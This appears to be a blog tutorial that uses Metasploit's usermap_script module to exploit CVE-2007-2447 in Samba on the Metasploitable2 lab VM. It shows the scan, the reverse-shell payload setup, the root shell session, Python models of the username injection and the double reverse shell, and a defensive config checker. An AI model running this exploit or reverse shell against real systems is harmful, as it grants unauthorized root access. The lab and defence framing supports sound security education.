• Metasploit exploitation: a Samba exploitation demo


    Metasploitable2 is a deliberately vulnerable Ubuntu virtual machine built for testing security tools and demonstrating common exploits.

    Download Metasploitable2 from:

    https://jaist.dl.sourceforge.net/project/metasploitable/Metasploitable2/

    After downloading, open the image in VMware and it is ready to use.

    Metasploitable's default username is msfadmin and the password is msfadmin.

    After logging in, run ip addr to find the IP address; in this example it is 192.168.59.132.

    First scan the Linux target to collect information about the services it exposes. Run nmap with version detection (-sV) to list the open ports and identify the applications behind them; msfconsole passes commands it does not recognise, such as nmap, through to the system shell, which is why the output begins with an exec: line.

    msf5 > nmap -sV 192.168.59.132
    [*] exec: nmap -sV 192.168.59.132
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 20:02 CST
    Nmap scan report for 192.168.59.132
    Host is up (0.00025s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec        netkit-rsh rexecd
    513/tcp  open  login?
    514/tcp  open  tcpwrapped
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    MAC Address: 00:0C:29:EF:91:7E (VMware)
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds
    msf5 > 

    With the target information collected, pick the right exploit and a suitable payload for it. The scan shows Samba listening on ports 139 and 445, but nmap's banner match is coarse (3.X - 4.X), and the exact version decides which module applies, so compare the target against the affected-version range in each candidate module's description before choosing.

    Samba is free software that implements the SMB (Server Message Block) protocol on Linux and Unix systems. SMB is a protocol for sharing files and printers over a LAN; it lets Linux and Windows machines on the same network share files, printers and similar resources.

    Enter search samba to list the modules related to Samba and pick an exploit module from the results.

    msf5 > search samba
    
    Matching Modules
    ================
    
       #   Name                                                 Disclosure Date  Rank       Check  Description
       -   ----                                                 ---------------  ----       -----  -----------
       0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
       1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
       2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
       3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
       4   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
       5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
       6   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
       7   exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
       8   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
       9   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
       10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
       11  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
       12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
       13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
       14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
       15  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
       16  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
       17  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
       18  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
       19  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
       20  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
       21  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
       22  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
       23  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
       24  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
       25  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations
    
    
    msf5 > 

    Metasploit returns the list of matching modules, sorted by module name. The Rank column grades how reliable each exploit is (excellent, great, good, normal, average, low, manual), not how hard the target is to attack: "excellent" means the module should never crash the service, which is typical of command injection rather than memory corruption. The search is a plain text match, so unrelated hits such as distcc_exec or the Sambar web server modules also appear in the list.

    exploit/multi/samba/usermap_script is ranked Excellent, so to maximise the chance of success it is the module used for the rest of this walkthrough. Rank alone is not enough, though: the other Excellent Samba module, is_known_pipename (disclosed 2017), targets a different bug and needs a writable share, and a newer disclosure date does not mean the target is vulnerable to it. Choose by matching the module's stated affected versions (3.0.20 through 3.0.25rc3 here) to the target; Metasploitable2 ships Samba 3.0.20, which is inside that range.

    Detailed information about the module and the vulnerability it exploits is available with the info command.

    msf5 > info exploit/multi/samba/usermap_script 
    
           Name: Samba "username map script" Command Execution
         Module: exploit/multi/samba/usermap_script
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2007-05-14
    
    Provided by:
      jduck <jduck@metasploit.com>
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
      RPORT   139              yes       The target port (TCP)
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits a command execution vulnerability in Samba 
      versions 3.0.20 through 3.0.25rc3 when using the non-default 
      "username map script" configuration option. By specifying a username 
      containing shell meta characters, attackers can execute arbitrary 
      commands. No authentication is needed to exploit this vulnerability 
      since this option is used to map usernames prior to authentication!
    
    References:
      https://cvedetails.com/cve/CVE-2007-2447/
      OSVDB (34700)
      http://www.securityfocus.com/bid/23972
      http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
      http://samba.org/samba/security/CVE-2007-2447.html
    
    msf5 > 
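    Why a username alone is enough to run commands, shown as an added example that is not Samba's or Metasploit's code: the "username map script" is invoked through /bin/sh with the client-supplied name interpolated into its command line, so a backtick expression inside the name is evaluated before the script ever sees it. MAP_SCRIPT (/bin/echo standing in for a real map script) and the injected command are assumptions for this demo; the username shape follows the one the usermap_script module sends in the SMB session setup, and the hardened variant shows the argv-list form that leaves metacharacters inert.

```python
import subprocess

# Added example: a model of CVE-2007-2447, not Samba's or Metasploit's code.
# MAP_SCRIPT stands in for the administrator's "username map script"; it is an
# assumption for this demo (any executable that takes the username as argv[1]).
MAP_SCRIPT = "/bin/echo"


def map_username_vulnerable(username: str) -> str:
    """Samba 3.0.20 - 3.0.25rc3 pattern: interpolate the client-supplied name
    into one command line and hand it to /bin/sh.  Wrapping it in double
    quotes does not help: backticks and $(...) still expand inside them."""
    cmdline = f'{MAP_SCRIPT} "{username}"'
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def map_username_fixed(username: str) -> str:
    """Hardened form: pass the name as a single argv element with no shell, so
    metacharacters reach the script as literal bytes."""
    return subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True).stdout


def attacker_username(command: str) -> str:
    """Shape of the name the usermap_script module sends: a slash and '=' so the
    mapping parser accepts it, then a backtick-wrapped command.  'nohup' keeps
    the payload alive after the map script exits."""
    return f"/=`nohup {command}`"


if __name__ == "__main__":
    probe = "/=`echo INJECTED`"          # constructed probe, harmless on purpose
    print("vulnerable:", repr(map_username_vulnerable(probe)))
    print("fixed:     ", repr(map_username_fixed(probe)))
    print("module-style name:", attacker_username("id"))
```

    The vulnerable path returns /=INJECTED (the command ran), while the hardened path returns the name unchanged. Since the mapping happens before authentication, the server never checks a password before running the shell, which is exactly why the module needs no credentials.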

    Enter use to select the exploit module. The Metasploit prompt changes from msf5 > to msf5 exploit(multi/samba/usermap_script) > .

    msf5 > use exploit/multi/samba/usermap_script 
    msf5 exploit(multi/samba/usermap_script) > 

    Enter show payloads to list the payloads compatible with this module. The module's Arch is cmd and its Platform is Unix: it runs a shell command on the target rather than injecting native code, so only cmd/unix payloads are offered, and a native Linux payload (linux/x86/...) would not apply even though the target is a Linux machine.

    msf5 exploit(multi/samba/usermap_script) > show payloads
    
    Compatible Payloads
    ===================
    
       #   Name                                Disclosure Date  Rank    Check  Description
       -   ----                                ---------------  ----    -----  -----------
       0   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
       1   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
       2   cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
       3   cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
       4   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
       5   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
       6   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
       7   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
       8   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
       9   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
       10  cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
       11  cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
       12  cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
       13  cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
       14  cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
       15  cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
       16  cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
       17  cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
       18  cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
       19  cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
       20  cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
       21  cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
       22  cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
       23  cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
       24  cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
       25  cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
       26  cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
       27  cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
       28  cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
       29  cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
       30  cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
       31  cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
       32  cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
       33  cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
       34  cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
       35  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
       36  cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
       37  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
       38  cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
    
    msf5 exploit(multi/samba/usermap_script) > 

    Here the basic cmd/unix/reverse payload (a double reverse TCP shell built on telnet) is chosen. Then set the target IP and port (RHOSTS, RPORT) and the attacker's listening address (LHOST is the IP of the machine running Metasploit, 192.168.59.128 in this example; LPORT defaults to 4444 and must be reachable from the target, since a reverse payload connects back to it). Once everything is set, run show options again to confirm the configuration.

    msf5 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
    PAYLOAD => cmd/unix/reverse
    msf5 exploit(multi/samba/usermap_script) > show options 
    
    Module options (exploit/multi/samba/usermap_script):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   139              yes       The target port (TCP)
    
    
    Payload options (cmd/unix/reverse):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.59.132
    RHOSTS => 192.168.59.132
    msf5 exploit(multi/samba/usermap_script) > set RPORT 445
    RPORT => 445
    msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.59.128
    LHOST => 192.168.59.128
    msf5 exploit(multi/samba/usermap_script) > show options 
    
    Module options (exploit/multi/samba/usermap_script):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS  192.168.59.132   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   445              yes       The target port (TCP)
    
    
    Payload options (cmd/unix/reverse):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.59.128   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf5 exploit(multi/samba/usermap_script) > 

    With every parameter set, enter exploit (or run) to launch the attack.

    When the attack succeeds, Metasploit opens a shell on the target. The session is a raw command shell with no prompt, so commands are typed directly. To confirm the shell really belongs to the target, query the hostname, kernel and IP address and compare them with what the target itself reports; the module lists Privileged: Yes because smbd runs as root, so id is a worthwhile check as well.

    msf5 exploit(multi/samba/usermap_script) > exploit
    
    [*] Started reverse TCP double handler on 192.168.59.128:4444 
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo MhCC0KHN41rUi5op;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "MhCC0KHN41rUi5op
    "
    [*] Matching...
    [*] A is input...
    [*] Command shell session 1 opened (192.168.59.128:4444 -> 192.168.59.132:41441) at 2020-05-09 20:16:34 +0800
    
    hostname
    metasploitable
    
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    
    ip addr
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
        inet6 ::1/128 scope host 
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 00:0c:29:ef:91:7e brd ff:ff:ff:ff:ff:ff
        inet 192.168.59.132/24 brd 192.168.59.255 scope global eth0
        inet6 fe80::20c:29ff:feef:917e/64 scope link 
           valid_lft forever preferred_lft forever
    3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
        link/ether 00:0c:29:ef:91:88 brd ff:ff:ff:ff:ff:ff
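    What the handler output above is doing ("Accepted the first client connection", "Command: echo ...;", "Matching", "A is input"), as an added localhost model that is not Metasploit's code: cmd/unix/reverse makes two outbound connections, one carrying the shell's input and one its output, and the handler cannot know which is which, so it writes an echo probe down both and takes the connection that echoes the marker back as the output side. The fake victim here drives /bin/sh directly from Python sockets instead of the real payload's two telnet processes; the loopback address, ephemeral port and sample command are assumptions.

```python
import secrets
import select
import socket
import subprocess
import threading

# Added example modelling Metasploit's "reverse TCP double handler" and the
# cmd/unix/reverse payload on 127.0.0.1.  Not Metasploit's code: the real
# payload pipes /bin/sh through two telnet clients, but the handler logic
# (probe both connections, match the echo, use the other one as input) is the same.


def fake_victim(lhost: str, lport: int) -> None:
    """Stand-in for the payload: open two outbound connections and give /bin/sh
    one as stdin and the other as stdout.  The roles are assigned at random so
    the handler genuinely has to work out which socket is which."""
    first = socket.create_connection((lhost, lport))
    second = socket.create_connection((lhost, lport))
    sock_in, sock_out = (first, second) if secrets.randbelow(2) else (second, first)
    proc = subprocess.Popen(["/bin/sh"], stdin=sock_in.fileno(),
                            stdout=sock_out.fileno(), stderr=subprocess.STDOUT)
    proc.wait()                      # returns once the handler sends "exit"
    first.close()
    second.close()


def double_handler(listener: socket.socket, timeout: float = 10.0):
    """Accept two connections, send 'echo <marker>;' down both, and treat the one
    that echoes the marker back as the shell's output; the other is its input."""
    a, _ = listener.accept()
    b, _ = listener.accept()
    marker = secrets.token_hex(8)
    for s in (a, b):
        s.sendall(f"echo {marker};\n".encode())
    readable, _, _ = select.select([a, b], [], [], timeout)
    for s in readable:
        data = b""
        while not data.endswith(b"\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
        if marker.encode() in data:
            sock_out, sock_in = s, (b if s is a else a)
            return sock_in, sock_out
    raise TimeoutError("neither connection echoed the marker")


def run_command(sock_in, sock_out, cmd: str, timeout: float = 10.0) -> str:
    """Run one command and collect its output up to a per-command end tag."""
    tag = secrets.token_hex(8)
    sock_out.settimeout(timeout)
    sock_in.sendall(f"{cmd}; echo {tag}\n".encode())
    buf = b""
    while tag.encode() not in buf:
        chunk = sock_out.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.split(tag.encode())[0].decode()


def demo(cmd: str = "echo hello from the double shell") -> str:
    """Start a handler, let the fake victim connect back, run one command."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))   # ephemeral port: an assumption for the demo
    listener.listen(2)
    lhost, lport = listener.getsockname()
    t = threading.Thread(target=fake_victim, args=(lhost, lport), daemon=True)
    t.start()
    sock_in, sock_out = double_handler(listener)
    try:
        return run_command(sock_in, sock_out, cmd)
    finally:
        sock_in.sendall(b"exit\n")
        sock_in.close()
        sock_out.close()
        listener.close()
        t.join(timeout=5)


if __name__ == "__main__":
    print(demo(), end="")
```

    The probe is the "Command: echo ...;" line in the Metasploit output, and "A is input" is the handler's conclusion after the marker came back on socket B. The same trick is what makes the payload work on a minimal target: it needs only telnet and sh, not a netcat with -e.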

    Defence:

    The flaw (CVE-2007-2447) affects Samba 3.0.20 through 3.0.25rc3 and is only reachable when the non-default "username map script" option is configured: the client-supplied username is interpolated into the command line of that script, so a name containing shell metacharacters executes arbitrary commands, before authentication and with the privileges of smbd. Upgrade Samba to 3.0.25 or later (the release containing the fix), or remove the "username map script" option from smb.conf and use a static "username map" file instead; testparm -s | grep "username map script" shows whether the option is active on a host. Because the exploit needs no credentials, also limit who can reach ports 139 and 445 with host firewalling or Samba's hosts allow option.
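    An offline check for the two conditions above, as an added example that is not Samba's tooling: it parses the [global] section of an smb.conf (or testparm -s output) for "username map script" and compares the reported Samba version with the affected range, treating 3.0.25rc3 as older than the fixed 3.0.25 release. The two configuration samples, the script path and the version strings are constructed for the demo; the weak sample shows the exploitable setting and the hardened one replaces it with a static username map file.

```python
import re

# Added example: an offline CVE-2007-2447 exposure check.  Not Samba's tooling;
# feed it smb.conf text (or `testparm -s` output) plus the version string
# obtained from a banner such as Metasploit's smb_version scanner.

VULN_LOW, VULN_HIGH = "3.0.20", "3.0.25rc3"

# Constructed sample configurations (paths are hypothetical).
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   # dynamic mapping through an external script: this is the attack surface
   username map script = /usr/local/bin/mapusers.sh
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   ; static mapping file instead of a script: no shell is involved
   username map = /etc/samba/smbusers
"""


def parse_version(v: str):
    """Order '3.0.25rc3' below '3.0.25': a final release sorts above any rc of
    the same number.  Vendor suffixes such as '3.0.20-Debian' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", v)
    if not m:
        raise ValueError(f"unrecognised Samba version: {v!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))


def in_vulnerable_range(v: str) -> bool:
    return parse_version(VULN_LOW) <= parse_version(v) <= parse_version(VULN_HIGH)


def global_params(conf: str) -> dict:
    """Collect [global] parameters.  Samba ignores case, spaces and '_' in
    parameter names, so keys are normalised the same way; lines starting with
    '#' or ';' are comments."""
    params, section = {}, None
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("["):
            section = line.strip("[]").strip().lower()
            continue
        if section == "global" and "=" in line:
            key, value = line.split("=", 1)
            params[re.sub(r"[\s_]", "", key).lower()] = value.strip()
    return params


def audit(conf: str, version: str) -> dict:
    """Exploitable only when BOTH the script option is set and the version is
    in range; either fix on its own closes CVE-2007-2447."""
    script = global_params(conf).get("usernamemapscript")
    in_range = in_vulnerable_range(version)
    return {
        "version": version,
        "version_in_range": in_range,
        "username_map_script": script,
        "exploitable": bool(script) and in_range,
    }


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for ver in ("3.0.20-Debian", "3.0.26a"):
            print(name, audit(conf, ver))
```

    In a real assessment, replace the sample text with the output of testparm -s from the host, which prints the effective configuration with defaults resolved; the version string comes from the banner the target returns, not from nmap's 3.X - 4.X guess.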

  • Original article: https://www.cnblogs.com/zhengna/p/12860480.html
Copyright © 2020-2023  润新知